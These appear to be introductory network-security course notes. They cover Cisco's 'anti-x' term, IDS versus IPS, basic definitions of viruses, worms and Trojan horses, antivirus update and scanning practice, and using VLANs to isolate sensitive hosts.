• When reading white papers and sales documents regarding the ASA, you'll come across an interesting term - "anti-x". No, "x" isn't some new mysterious virus or network security issue! "x" is simply used by Cisco to encompass all of the "antis" the ASA offers, such as "anti-virus" and "anti-spam". Instead of listing all of the "antis" their product offers, Cisco simply says "anti-x". Just wanted you to know so it wouldn't make you wonder as it did me the first time I saw it! ;)


• Cisco also offers the Intruder Detection System (IDS), which Cisco's website describes as…

• "Providing complete intrusion protection, Cisco IDS delivers a comprehensive, pervasive security solution for combating unauthorized intrusions, malicious Internet worms, along with bandwidth and e-Business application attacks."

• On the other hand, the Cisco IPS - Intrusion Prevention System - is described by their website as follows:
– "The Cisco Intrusion Prevention System (IPS) solution is an integral part of the Cisco Self-Defending Network and Cisco Threat Control solutions, providing end-to-end protection. This inline, network-based defense can identify, classify, and stop known and unknown threats, including worms, network viruses, application threats, system intrusion attempts, and application misuse."

Page 131: Notes

• If there's one thing you must have working at full capacity in your network, it's the antivirus programs.

• If there's one thing that is commonly overlooked when it comes to updates, it's the antivirus programs.

• In today's world, your network must be protected from both internal and external virus threats. By implementing and executing an aggressive antivirus strategy, you can greatly reduce your network's chances of being hit with a virus. Literally hundreds of millions of dollars in productivity are lost every year due to virus attacks, along with a few jobs. Make sure both your network and career are protected!


• Just as a human virus is spread through contact, so is a computer virus. A virus is a program that gets onto a computer without a user's knowledge and then performs an action that can range from mischievous to destructive. For a virus to be spread, there has to be some kind of contact between an infected user and another user - generally, that contact is the forwarding of an email that has an attachment that contains a virus.

Page 132: Notes

• A worm is a type of virus, but a worm can spread on its own without any "help" from the infected host. Even worse, a worm can replicate on its own, resulting in many more worms attacking other hosts. A common worm attack involves the worm sending a copy of itself to every single user listed in the infected host's email address book.

• A third, more insidious attacker is the Trojan Horse. In history, the Trojan Horse was presented as a gift to Troy by the Greeks, and it was filled with Greek soldiers who attacked once the Horse was taken inside the city's defenses.

• Today's Trojan Horses attack in much the same fashion. The program installed by the user may look legitimate and innocent, but there's another program inside just waiting to attack the user's computer.

• It's a good idea to periodically remind your end users about some basic steps they can take to help prevent unleashing a virus:
– Don't open email attachments from anyone outside the company.
– Don't download software and install it, especially "fun and free" software such as gaming programs, animated cursors, etc.
– Don't open email from anyone you don't know.

Page 133: Notes

Choosing And Configuring An Antivirus Program

• I strongly recommend you choose an antivirus program that offers automatic updates. If you rely on manual updates - that is, relying on remembering to go out and check for updates yourself instead of having them automatically downloaded when new updates are available - I can practically guarantee you're going to forget to do so, and this can be a fatal mistake for both your network and your career.

• The #1 mistake network administrators and home PC owners alike make with antivirus software is not keeping the program up-to-date. New viruses are being created every minute of every day, and reputable antivirus program vendors such as Symantec are monitoring that situation, looking for new viruses and writing virus signature updates or virus definitions regularly. (A virus signature is the actual binary pattern of a virus, and just as your signature identifies you, a virus signature identifies the virus.)

• Even with this protection, 100% protection from viruses isn't guaranteed. There are polymorphic viruses that actually change their own signature each time they replicate, which makes it much more difficult for an antivirus program to identify and eliminate them.

Page 134: Notes

What Files Should Be Scanned For Viruses?

• When you configure antivirus software, you'll have the option of setting a time when a virus scan should run on the host, as well as what files should be scanned for viruses. If your network PCs are left on at night, setting the antivirus program to run a full scan at 1 AM is a great idea.

• First on your list should be any file whose extension is .com, .exe, .ocx, or .dll. These are all executable files, which are primary carriers and targets of viruses. I personally like to scan a host's Microsoft Word documents as well, since those files are passed from user to user more often than any other file type.


• If You Turn Anti-Virus Software Off... TURN IT BACK ON!

• Sorry for the yelling, but this is a great way for viruses to sneak into your network.

• Most network administrators have been in a position where they've had to turn the antivirus program off, and you may have installed programs on your own PC where the installation program recommends you to turn the antivirus program off.

Page 135: Notes

• And don't forget.... lock up your hardware - literally!


"Hiding" A Sensitive Network

• VLANs aren't just for limiting the scope of broadcasts on your network - they're actually a security feature as well!

• If you have a network in your business that should be hidden from the rest of the network, just put the "secret" hosts in their own VLAN.